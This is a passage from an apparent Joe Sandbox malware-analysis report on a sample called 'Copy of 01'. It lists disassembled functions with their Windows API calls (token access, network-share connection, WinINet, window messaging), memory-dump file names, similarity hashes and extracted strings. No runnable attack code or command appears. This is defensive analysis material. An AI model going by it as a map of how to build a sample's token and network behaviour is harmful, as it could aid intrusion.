                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039163B
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003911D9), ref: 00391648
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039164F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                        • Instruction ID: e31dfa392617f8b737990959dd59213d9db59ad25e25368c7372dde19b3fabf5
                        • Opcode Fuzzy Hash: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                        • Instruction Fuzzy Hash: C0E08671A11221DBDB211FA0AD0DF463B7CBF44791F194808F649D9080D6389441C750
                        Function 0038D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 0038D858
                        • GetDC.USER32(00000000), ref: 0038D862
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                        • ReleaseDC.USER32(?), ref: 0038D8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                        • Instruction ID: b512835d961f1024dd04219318f288311399d7c6afda3a234cb1257bdaa75af2
                        • Opcode Fuzzy Hash: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                        • Instruction Fuzzy Hash: BBE01AB4810204DFCB42AFA0D90CA6DBBB9FB08310F18A049E84AE7250C738A912EF40
                        Function 0038D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 0038D86C
                        • GetDC.USER32(00000000), ref: 0038D876
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                        • ReleaseDC.USER32(?), ref: 0038D8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                        • Instruction ID: 4baefee4fa827a2eca2d26550109121cea67b1446aed8ba2e54bbfadbabc3e16
                        • Opcode Fuzzy Hash: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                        • Instruction Fuzzy Hash: 6CE09A75810204DFCB52AFA0D94CA6DBBB9BB08311F18A449E94AE7250C739A912DF50
                        Function 003A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003A4ED4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Connection_wcslen
                        • String ID: *$LPT
                        • API String ID: 1725874428-3443410124
                        • Opcode ID: c20ff230648b70cae460a2a1b63979d902ddb23ddb35705b7d7c268163916977
                        • Instruction ID: 426641172b707f2575c2e3259d35a0100973cc054898e384091aa8643bb4e4fd
                        • Opcode Fuzzy Hash: c20ff230648b70cae460a2a1b63979d902ddb23ddb35705b7d7c268163916977
                        • Instruction Fuzzy Hash: 8B917D75A002049FDB16DF58C484EAABBF5FF86304F198099E80A9F362C775ED85CB90
                        Function 003B7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,?,00000000,00000000), ref: 003B78DD
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,00000000,?,00000000,00000000), ref: 003B783B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper$_wcslen
                        • String ID: <s?
                        • API String ID: 3544283678-1615119086
                        • Opcode ID: e2982f40bdf4fc0c516f456517016c1117bbe207e195fe1574dd9d7750d421b6
                        • Instruction ID: 7e7d055f2aa427503f5f8219f8423a7f55be55b80a1b5193f5c8619542702fb6
                        • Opcode Fuzzy Hash: e2982f40bdf4fc0c516f456517016c1117bbe207e195fe1574dd9d7750d421b6
                        • Instruction Fuzzy Hash: 8A613C76914119AACF07EBA4CC92DFDB378FF54704F44412AE642BB491EF306A09DBA0
                        Function 0034E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: #
                        • API String ID: 0-1885708031
                        • Opcode ID: f545098ebe377761b9b6d5f8726c14c5ccb373277a82c762cf1d16f692413649
                        • Instruction ID: 9381c54f57cc7bbdb4fe4b9204985b05ee44665c1b5e88cd87a023159f2804dd
                        • Opcode Fuzzy Hash: f545098ebe377761b9b6d5f8726c14c5ccb373277a82c762cf1d16f692413649
                        • Instruction Fuzzy Hash: C6510D35A04346DFDB17EF28C481ABA7BA8FF55310F248599F8919F2D0D674AD42CBA0
                        Function 0034F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 0034F2A2
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0034F2BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                        • Instruction ID: ddfc89ae0779a43aafa48bce5756ef524f63a4b5f91c4a71e7486ebd78214013
                        • Opcode Fuzzy Hash: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                        • Instruction Fuzzy Hash: C55155724187489BD321AF10DC86BAFBBFCFB84304F81884CF1D9551A5EB309929CB66
                        Function 003B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003B57E0
                        • _wcslen.LIBCMT ref: 003B57EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcslen
                        • String ID: CALLARGARRAY
                        • API String ID: 157775604-1150593374
                        • Opcode ID: 2b79e162086735cb76063caca46539fd3e6c03ee33da8b4cf3d3893eb979ed86
                        • Instruction ID: 36e997e9a80ea81184a62703b7189bac12b83c348dbfa312b99e870cd847370e
                        • Opcode Fuzzy Hash: 2b79e162086735cb76063caca46539fd3e6c03ee33da8b4cf3d3893eb979ed86
                        • Instruction Fuzzy Hash: B5419F31A002099FCB16DFA9C882AFEBBF5FF59324F154069E605EB251E7309D81CB90
                        Function 003AD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 003AD130
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003AD13A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                        • Instruction ID: bc4f7290c3284479d90da3acf9d19b93762fde2ce5fff4923e66ca5027055a47
                        • Opcode Fuzzy Hash: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                        • Instruction Fuzzy Hash: 79311A71D00209AFCF16EFA4CD85AEEBFB9FF09300F004019F815AA162D735AA46CB90
                        Function 003C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 003C3621
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C365C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                        • Instruction ID: 5aa879ff08f4e3a94ed824963f3a46f977d6773227ac1083a05962ab0df11307
                        • Opcode Fuzzy Hash: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                        • Instruction Fuzzy Hash: AC31AA71110204AEDB129F68CC81FFB73A9FF88720F01961DF8A9D7280DA35AD91CB60
                        Function 003C4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C461F
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C4634
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                        • Instruction ID: dddf9b455e1026c7b5cf68a53eea927bd23222a3fff046d2d862bad0a600bf5f
                        • Opcode Fuzzy Hash: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                        • Instruction Fuzzy Hash: 62311774A002099FDB15CF69C990FDABBB5FB49300F14406AE904EB351D770AD51CF90
                        Function 003C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C327C
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C3287
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                        • Instruction ID: eb1cc43a44d0f9ecd4d586f8da7da1e875717be558ce1f6e9b264a5766427801
                        • Opcode Fuzzy Hash: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                        • Instruction Fuzzy Hash: F711B2713002087FEF269F54DC81FBB776EEB94364F118529F918DB290D671AD518760
                        Function 003C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        • GetWindowRect.USER32(00000000,?), ref: 003C377A
                        • GetSysColor.USER32(00000012), ref: 003C3794
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                        • Instruction ID: fd3f893cb346b5edf44789615b399d28565b99f52191c968c39f8e5ab992ec97
                        • Opcode Fuzzy Hash: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                        • Instruction Fuzzy Hash: E7113AB2610209AFDF02DFA8CC46EEA7BF8FB09314F015518F955E2250D735ED519B50
                        Function 003ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003ACD7D
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003ACDA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                        • Instruction ID: cc53262a50907b1ce237b1873a03db62a2566ae9d5006443c45bd8a831f216ef
                        • Opcode Fuzzy Hash: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                        • Instruction Fuzzy Hash: B511C271225635BAD73A4B668C49EF7BEACEF137A4F00522AF11983580D7709840D6F0
                        Function 003C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 003C34AB
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C34BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                        • Instruction ID: d740fc2069bc19ed050203526647bee8a79637d8cfbb0f2e3a9af368e266de48
                        • Opcode Fuzzy Hash: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                        • Instruction Fuzzy Hash: D6118871100208AAEB178E65DC80FAA36AAEB05374F518328F964D71E0C731ED519B60
                        Function 00396C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • CharUpperBuffW.USER32(?,?,?), ref: 00396CB6
                        • _wcslen.LIBCMT ref: 00396CC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: STOP
                        • API String ID: 1256254125-2411985666
                        • Opcode ID: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                        • Instruction ID: 2a5fab5ca46b2eebd9bf4bb33ce96071ff2b4ddca5e5d59f8add7efffe7d9d29
                        • Opcode Fuzzy Hash: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                        • Instruction Fuzzy Hash: D40104326119268ACF239FBDDC829BF37A8EA60710B020534F86296194EB31E800CA50
                        Function 00391CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00391D4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 5cdb1c18eebf846200f70e9da7e3024c3f8bd303be8acd6c519bdc16bedd9533
                        • Instruction ID: cca44a25c546fabcdbbb3a1140cd2f1300129d2f08e50a45b51b47c5839dc644
                        • Opcode Fuzzy Hash: 5cdb1c18eebf846200f70e9da7e3024c3f8bd303be8acd6c519bdc16bedd9533
                        • Instruction Fuzzy Hash: C301D871651219ABCF0AFBA4CD55DFE7768EF46350F04051AF8226B2D1EA705908C760
                        Function 00391BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00391C46
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
